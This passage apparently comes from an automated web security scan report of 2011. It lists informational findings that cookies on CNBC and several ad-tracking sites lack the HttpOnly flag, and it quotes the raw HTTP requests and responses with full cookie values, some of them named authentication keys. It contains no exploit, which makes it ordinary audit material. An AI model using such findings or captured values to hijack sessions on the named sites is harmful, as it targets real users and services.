GET /site/3834 HTTP/1.1 Host: tags.bluekai.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: bk=gmD52hDC+h5Mq/0A; bkc=KJh5NeNGDNWROreldiEuJLD45sinQgWZa3GG/iQ+uErG5mCPWvPGLDB/CbTmnG3Yk+nie0MRxz5rQivkrGikWHy5miQH3Qfho2MOHSiYN4Kf0qA2lTczJ9IXlp77mdKKZy5xF9o1chZnwwfwXpgU37lVXDiTT5HVRvcPhIdOurvF5Dd8zWaqbG6dqQct+4iTtNtJdvqf1NYVFwW64V7PyXhbmDgMEKhhhfD4tF5EF7JfGOlV54fAUZtjldR0h2ddghyaKOlfulmI9O8SrazFjCo8bDIXKWwfhcP+IEVrXr+oOpY6zGg2pCXuwlWLbpaIpw38mKeTkx+hFqClxkF0hMK8+tFL2l7UDmJFZfxMUgSklFC+9wHB9q5oFI7nafU4c2PKzMhbDnr7DfFDgilptIR7XDdt5TFggtDqbh1cFbOXm31+Thk4ulWdCgkZ0bmC2GMk3zNX7+RXFn1XbEC5NXT8lrNRhM4IhmquhTepAwbthyT5u2bTpm5FXRIcHtMDidK1xP70hMrpxar7C2ZcQTApMiPFFvLBsmj8KaDLX4ZrfHYFXiPQVdnsW8hFsXdUZVzezqNTQ4+FVdnsnlAdyiGyUICwwJ7EkghhkzT0lNL3Ju8Z+YPFF1n8jFkI0PUbWC2ync7MFIpdXf3cfdABn2dHfiCGnlPoedOXtJqhMHX6f2I2e26Hi42z+Q0L; bko=KJhf0X49XB1pNRIHyjQ4hMGZ0LexgykilKOQRcY+ixS0JgWh1shPX4PMj8M/eVWh1jpZRZeGOq/RsKETRS0pleeVnhW/iT7Cei21nOc/rLReWo1atF+YpzSwZDWu0ZJA99YljOt7; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAg6FxNWRh7dUE4UeP6LMyzYAxSDkOAv6m7uQ9bnSHkn2J6H1H9KhtuyZGNkihivHBm/wxmQPBGwGJLfg+MtPa7zT8IxXfd1Ipl7KIpA12agz3LNenQTsqLdj/50Bt/CcqEbmhMHueWJL0YnSj33fMlWyvjMOw+ubcojN1yFmAmRcZJFxdaaPWlBqleiC7SZkh7pdovgiMSyOUxuZsNzB3u3Dab70LpaF3XHlTs/VTZVUeATMQCE1u9X10BkPxMbeUWjVCII8Sn9U+PItKYklnNc+Iu40IiLic/4u1SsLPrI8F+5dMcO1hZ1ht9HKMCK6rkK5SSkAS5RQeyAfd0LWrD8GJvDuhtVHP+6bYYNgjcFaHixpAbt17j7TtaP/EYcFCFyBE6kGPC0Mb+7mlm68pXFBpefkMFASUi4ajm1o73h3UxKwvSNf/m4V03pr6loVdH7oUwgrfvPfEukVc4tPjqlEn2H6MMT=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpn+16wb9D9y+ejQPVux9SlyLv; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e66358a; bkdc=sf
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:28 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Wed, 07 Sep 2011 15:00:28 GMT Cache-Control: max-age=86400, privateSet-Cookie: bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=sf; expires=Wed, 07-Sep-2011 15:00:28 GMT; path=/; domain=.bluekai.com BK-Server: bbc9 Content-Length: 62 Content-Type: image/gif GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;
13.195. http://tenzing.fmpub.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tenzing.fmpub.net
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?t=z&n=4479&keywords=business|electroniccommerce|gatewayinc|ibmcorp|&fleur_de_sel=1936597090680152 HTTP/1.1 Host: tenzing.fmpub.net Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltuid=1e26f8d5f332f1261c9af6b2d31021eb; vuid=1e26f8d5f332f1261c9af6b2d31021eb
Response
HTTP/1.0 204 No Content Date: Tue, 06 Sep 2011 15:32:43 GMT Server: Apache/2.2 X-Powered-By: PHP/5.3.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cacheSet-Cookie: vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/ Content-Length: 0 X-Server: adserver5.tor.fmpub.net Connection: close Content-Type: application/x-javascript
13.196. http://ticker.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ticker.cnbc.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ticker.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Mon, 04 Dec 2006 02:08:57 GMT ETag: "32-423bdd50c8040" Accept-Ranges: bytes Content-Length: 50 Content-Type: text/html Expires: Tue, 06 Sep 2011 15:05:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:05:59 GMT Connection: closeSet-Cookie: pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/ <script> window.location="/main.do"; </script>
13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.actonsoftware.com
Path:
/acton/bn/1227/visitor.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /acton/bn/1227/visitor.gif?ts=1315341157226&ref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1 Host: www.actonsoftware.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/ P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: image/gif;charset=UTF-8 Content-Length: 43 Date: Tue, 06 Sep 2011 15:32:49 GMT Connection: close GIF89a.............!.......,...........L..;
13.198. http://www.bizographics.com/collect/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.bizographics.com
Path:
/collect/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /collect/?pid=901&url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&pageUrl=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&time=1315341168499 HTTP/1.1 Host: www.bizographics.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 200 OK Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:33:01 GMT Server: nginx/0.7.61 Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/ Content-Length: 9 Connection: keep-alive //opt out
13.199. http://www.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&source=(The%20Associated%20Press%20OR%20Reuters%20OR%20AFX%20OR%20The%20New%20York%20Times%20OR%20CNBC.COM)&layout=NoPic&pubtime=0&pubfreq=h User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zce56gUZZEw56g4QDxJdQx%2fwgxtDBNooSLeqlBQuP1n34%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FqHt53A9BlIs=; TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:56:26 GMT Via: 1.1 C aicache6 Content-Length: 229771 Set-Cookie: xaikeeperua=yes; path=/ X-Aicache-OS: 207.46.150.45:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Thu, 01 Jan 1970 00:00:00 GMT <html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Find the latest stock market news, information & headlines. Get u...[SNIP]...
13.200. http://www.cnbc.com/id/15837856
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/id/15837856
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/15837856 HTTP/1.1 Host: www.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339051482; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856%2526ot%253DA
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:57:30 GMT Via: 1.1 C aicache6 Content-Length: 184638 X-Aicache-OS: 207.46.150.45:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:57:36 GMT <html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section & see the full online T...[SNIP]...
13.201. http://www.cnbc.com/id/15837856/site/14081545/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/id/15837856/site/14081545/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/15837856/site/14081545/ HTTP/1.1 Host: www.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:57:32 GMT Via: 1.1 C aicache6 Content-Length: 184638 X-Aicache-OS: 207.46.150.45:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:57:38 GMT <html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section & see the full online T...[SNIP]...
13.202. http://www.cnbc.com/id/15838394
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/id/15838394
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/15838394 HTTP/1.1 Host: www.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/id/15837856/site/14081545/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc5CZLOLbsDADnCVB%2fPbg0Qo%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fk2EwXOuiXD0=; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339076706; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CCNBC%252520U.S.%252520T%25257C%25257C15837856%25257CCNBC%252520U.S.%252520Television%25252C%252520TV%252520Schedule%252520for%252520Primetime%252520Te%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15838394%2526ot%253DA
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:58:00 GMT Via: 1.1 C aicache6 Content-Length: 132851 X-Aicache-OS: 65.55.53.237:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:58:07 GMT <html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content=""The Call" is a full hour of analysis, discussion and debat...[SNIP]...
13.203. http://www.cnbc.com/id/15839263/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/id/15839263/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/15839263/ HTTP/1.1 Host: www.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:06:40 GMT Via: 1.1 C aicache6 Content-Length: 103803 X-Aicache-OS: 65.55.53.237:80 Connection: close Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 15:06:47 GMT <html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View our CNBC video gallery and find video news clips on the stock ma...[SNIP]...
13.204. http://www.cnbc.com/pointrollads.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/pointrollads.htm
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/ cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pointrollads.htm HTTP/1.1 Host: www.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/ Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:06:42 GMT Via: 1.1 aicache6 Content-Length: 95136 X-Aicache-OS: 65.55.53.237:80 Connection: close <html class="cnbc_html" xmlns:tvservices="http://www.msnbc.com"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://w...[SNIP]...
13.205. http://www.csc.com/cybersecurity/contact_us
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.csc.com
Path:
/cybersecurity/contact_us
Issue detail
